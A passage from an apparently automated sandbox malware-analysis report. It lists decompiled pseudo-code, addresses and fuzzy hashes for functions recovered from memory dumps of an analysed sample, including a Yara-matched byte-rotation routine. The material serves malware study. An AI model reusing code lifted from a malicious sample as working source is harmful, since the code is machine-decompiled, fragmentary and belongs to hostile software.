				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E030BCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x030daa1f
0x030daa21
0x030daa23
0x030daa2b
0x030daa30
0x030daa36
0x030daa39
0x030daa42
0x030daa75
0x030daa7a
0x030daa7c
0x030daa7c
0x030daa88
0x030daa8a
0x030daa8f
0x030dab02
0x030dab04
0x030daa99
0x030daaa8
0x030daaaf
0x030daab3
0x030daacc
0x030daad1
0x030daad6
0x030daae0
0x030daaf3
0x030daaf9
0x030daafe
0x030daafe
0x030daaf3
0x030daad6
0x030daab3
0x030dab07
0x030dab0a
0x030dab11
0x030dab23
0x030dab13
0x030dab1c
0x030dab1c
0x030dab2b
0x030dab44
0x030dab44
0x030dab51
0x030dab51
0x030daa44
0x030daa47
0x030daa4c
0x00000000
0x00000000
0x030daa5a
0x030daa64
0x030daa72
0x00000000
0x030daa66
0x030daa66
0x030daa68
0x030daa6a
0x00000000
0x030daa6a

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 04a68abb9b5aa746c5df85c8f1b3adb126e336d7e285459aabdcc1dfab656c83
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: A031F136F123446BDB15CB69C845BAFF7FAEFC5220F098069E805AB292DB74CD02C650

Uniqueness

Uniqueness Score: -1.00%

Function 030E22AE, Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E030E22AE(void* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				void* _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				void* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E030E21E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x2ffac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x2ffac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x2ffac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x2ffac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x2ffac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x2ffac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x2ffac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x2ffac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x3106110; // 0xd8264b48
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x3106110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E0302FFB0(_t77, _t114, _t114);
						}
						_t63 = E030E2FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E03032280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}

0x030e22b9
0x030e22c2
0x030e22c6
0x030e22c8
0x030e22d8
0x030e22e2
0x030e2303
0x030e2314
0x030e2321
0x030e234a
0x030e235b
0x030e236c
0x030e2372
0x030e2376
0x030e238f
0x030e238f
0x030e23b4
0x030e23c6
0x030e23c9
0x030e23cc
0x030e23cf
0x030e23cf
0x030e23e9
0x030e23ee
0x030e23f8
0x030e23fb
0x030e23fb
0x030e2403
0x030e240a
0x030e2378
0x030e237b
0x030e2381
0x030e2385
0x030e2385
0x030e238d
0x00000000
0x00000000
0x030e238d
0x030e2376
0x030e2417

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f56a09eecb189e829a1c397dc8e557af5464b524089cdbbbcab8538fc42f6379
Instruction ID: 704a67d354e3f32f9387fb5d88fab853e89684f3d753ddbe4b362640989435d4
Opcode Fuzzy Hash: f56a09eecb189e829a1c397dc8e557af5464b524089cdbbbcab8538fc42f6379
Instruction Fuzzy Hash: 4141F3712083418FC348DF28C8A597ABBE8EF85325F0A4A5DF4D58B2C2CB34D559CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 030DFDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E030DFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E030DFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E030E0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03037D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E030D1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E030E2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E030DC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E030DDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E03037D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E030DA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x030dfde7
0x030dfde8
0x030dfdec
0x030dfdee
0x030dfdf5
0x030dfdf7
0x030dfdfc
0x030dfe19
0x030dfe22
0x030dfe26
0x030dfec6
0x030dfecd
0x030dfed5
0x030dfee7
0x030dfed7
0x030dfee0
0x030dfee0
0x030dfeef
0x030dff00
0x030dff02
0x030dff07
0x030dff07
0x00000000
0x030dfeef
0x030dfe33
0x030dfe55
0x030dfe59
0x030dfe5b
0x030dfe5e
0x030dfe69
0x030dfe6d
0x030dfe6d
0x030dfe69
0x030dfe35
0x030dfe41
0x030dfe41
0x030dfe79
0x030dfe8b
0x030dfe7b
0x030dfe84
0x030dfe84
0x030dfe93
0x00000000
0x030dfea8
0x030dfeba
0x00000000
0x030dfeba
0x030dfdfe
0x030dfe01
0x030dfe02
0x030dfe08
0x030dff0c
0x030dff14
0x030dff14

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: d222d43ed46a978725f42ac5c28571906b992f9a2ce0c6f35fec4bd587df4465
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: A531D436302745AFD762DB68C844FAABBEAEFC5650F1C8458E8478F782DA74D841C760

Uniqueness

Uniqueness Score: -1.00%

Function 030E20A8, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E030E20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x3106110; // 0xd8264b48
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x3106110; // 0xd8264b48
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E030E2E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x3106110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E030E2E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x3106110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E030E2E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x3106110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x3106110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}

0x030e20a8
0x030e20b0
0x030e20b6
0x030e20ba
0x030e20be
0x030e20c4
0x030e20cb
0x030e20db
0x030e20e4
0x030e20e7
0x030e20e9
0x030e20ef
0x030e20f1
0x030e20fe
0x030e2102
0x030e2105
0x030e2105
0x030e2107
0x030e210d
0x030e2112
0x030e2115
0x030e2120
0x030e2120
0x030e2107
0x030e2126
0x030e2131
0x030e2133
0x030e213e
0x030e213e
0x030e2140
0x030e2146
0x030e214b
0x030e2156
0x030e2156
0x030e2140
0x030e215f
0x030e2165
0x030e2170
0x030e2172
0x030e217d
0x030e217d
0x030e217f
0x030e2185
0x030e2192
0x030e2192
0x030e217f
0x030e2170
0x030e2197
0x030e2199
0x030e21a1
0x030e21b1
0x030e21bf
0x030e21d6
0x030e21d6
0x030e21bf
0x030e21dd
0x030e21e5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1d8054998d0169f6a2518c38542b4db05cf3dcd2c88e0e15b9864bc4e79cb97
Instruction ID: 86ce378794c385a3772eed85bfc7bde2f42048a16e51025382bead803aa5b0c9
Opcode Fuzzy Hash: a1d8054998d0169f6a2518c38542b4db05cf3dcd2c88e0e15b9864bc4e79cb97
Instruction Fuzzy Hash: 1541AF37E0002A8FCB18EF68C491579F3F9FB8830575606BDD805AB295DB74AE91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030E2D07, Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E030E2D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E030E21E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x2ffac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x2ffac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x2ffac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x2ffac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x2ffac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x2ffac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x2ffac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x2ffac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x3106110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x3106110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x3106110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E0302B090(_v24, _t91, _v12, _t29);
			}

0x030e2d1f
0x030e2d2c
0x030e2d31
0x030e2d33
0x030e2d42
0x030e2d4b
0x030e2d51
0x030e2d5d
0x030e2d62
0x030e2d6e
0x030e2d71
0x030e2d7d
0x030e2d87
0x030e2d8d
0x030e2d91
0x030e2da5
0x030e2db7
0x030e2dc8
0x030e2dcf
0x030e2dd1
0x030e2dd3
0x030e2dd6
0x030e2ddb
0x030e2ddd
0x00000000
0x030e2ddf
0x030e2df5
0x030e2e0e
0x030e2e12
0x030e2e1a
0x030e2e1c
0x00000000
0x00000000
0x00000000
0x00000000
0x030e2e14
0x030e2e16
0x030e2e22
0x030e2e22
0x030e2e18
0x030e2e18
0x00000000
0x030e2e18
0x030e2e16
0x030e2df7
0x030e2df7
0x030e2dfc
0x030e2e04
0x030e2e06
0x030e2e1e
0x030e2e1e
0x00000000
0x00000000
0x00000000
0x00000000
0x030e2dfe
0x030e2e00
0x030e2e08
0x030e2e08
0x030e2e02
0x030e2e02
0x00000000
0x030e2e02
0x030e2e00
0x030e2dfc
0x00000000
0x030e2df5
0x030e2ddf
0x030e2e26
0x030e2e26
0x030e2e3c

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a216e558f493661c2b75e97266af39cc6895636cb1b40cd3696338b7a056fe6
Instruction ID: 0788f70f5359f6b923eb1814060a1167698f9362cd9363ca79c01f0f0ad4862c
Opcode Fuzzy Hash: 8a216e558f493661c2b75e97266af39cc6895636cb1b40cd3696338b7a056fe6
Instruction Fuzzy Hash: 034147316042658FC785DB69C8947BABFFCEF89201B0E81A6D885DB346DA34C966C370

Uniqueness

Uniqueness Score: -1.00%

Function 030DEA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E030DEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E03032280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E030DE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0301F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0302FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E030DAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E030DBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E03037D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E030CFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0302FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E030DA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x030dea55
0x030dea66
0x030dea68
0x030dea6c
0x030dea6f
0x030dea72
0x030dea75
0x030dea7a
0x030dea7a
0x030dea7e
0x030dea80
0x030dea85
0x030dea8b
0x030deab5
0x030deabc
0x030deabf
0x030deabf
0x030deaca
0x030deace
0x030dead0
0x030deae4
0x030deaeb
0x030deaf0
0x030deaf5
0x030deb09
0x030deb0d
0x030deb1d
0x030deb2d
0x030deb38
0x030deb3d
0x030deb41
0x030deb4a
0x030deb60
0x030deb4c
0x030deb52
0x030deb59
0x030deb59
0x030deb68
0x030deb71
0x030deb71
0x030dea8d
0x030dea8f
0x030dea92
0x030dea97
0x030dea97
0x030dea9b
0x030dea9c
0x030dea9e
0x030deaa6
0x030deaa6
0x030deb7e

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: f0dd1882c286642d7e3fdd5626d01b4923a85c6b4306a29f2623afcfe88d9315
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 9B31B4766067069BC719DF28C880AABB7E9FFC5650F04492DF5568B640DE30E805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 030969A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E030969A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x310d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03026C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03096BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03059980() >= 0) {
							E03032280(_t56, 0x3108778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3108774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3108774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0301B6F0(0x2ffc338, 0x2ffc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03059520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E030595D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0302FFB0(_t68, _t77, 0x3108778);
				}
				_pop(_t78);
				return E0305B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x030969b5
0x030969be
0x030969c3
0x030969c9
0x030969cc
0x030969d1
0x030969d3
0x030969de
0x030969e1
0x030969ea
0x030969f6
0x030969fe
0x03096a13
0x03096a14
0x03096a15
0x03096a16
0x03096a1e
0x03096a26
0x03096a31
0x03096a36
0x03096a37
0x03096a40
0x03096a49
0x03096a4a
0x03096a53
0x03096a59
0x03096a5d
0x03096a5e
0x03096a64
0x03096a67
0x03096a6a
0x03096a6d
0x03096a70
0x03096a77
0x03096a7d
0x03096a86
0x03096a89
0x03096a9c
0x03096a9f
0x03096aa2
0x03096aa5
0x03096aaf
0x03096ab1
0x03096ab8
0x03096ab9
0x03096abb
0x03096abe
0x03096ac5
0x03096ac5
0x03096aaf
0x03096a40
0x03096a26
0x030969fe
0x03096ace
0x03096ad0
0x03096ad3
0x03096ad8
0x03096adf
0x03096adf
0x03096ae8
0x03096aef
0x03096aef
0x03096af9
0x03096b06

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34fdd4d81aa709d0a7c60dd914efea55c7fe83fab919d8de61fb8177bb0a7282
Instruction ID: 9531716e2094e5e5b6a40c42ed44cbeb17719fa0ec0041945409a1be5454f10a
Opcode Fuzzy Hash: 34fdd4d81aa709d0a7c60dd914efea55c7fe83fab919d8de61fb8177bb0a7282
Instruction Fuzzy Hash: 8D418AB1E0230CAFEB14DFA4D840BEEBBF8EF48714F08812AE914A7250DB759905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00401030, Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}

0x00401030
0x0040105b
0x0040105d
0x00401063
0x00401065
0x00401065
0x00401071
0x00401076
0x0040107c
0x004010ac
0x004010ae
0x004010b4
0x004010ba
0x004010bc
0x004010bc
0x004010cb
0x004010d0
0x004010d6
0x00401101
0x00401103
0x00401109
0x0040110f
0x00401111
0x00401111
0x00401120
0x00401128
0x0040112b
0x0040114f
0x00401156
0x0040115d
0x00401169
0x0040116c
0x0040116f
0x00401173

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5

Uniqueness

Uniqueness Score: -1.00%

Function 03015210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03015210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E030152A5(1);
				if(_t61 == 0) {
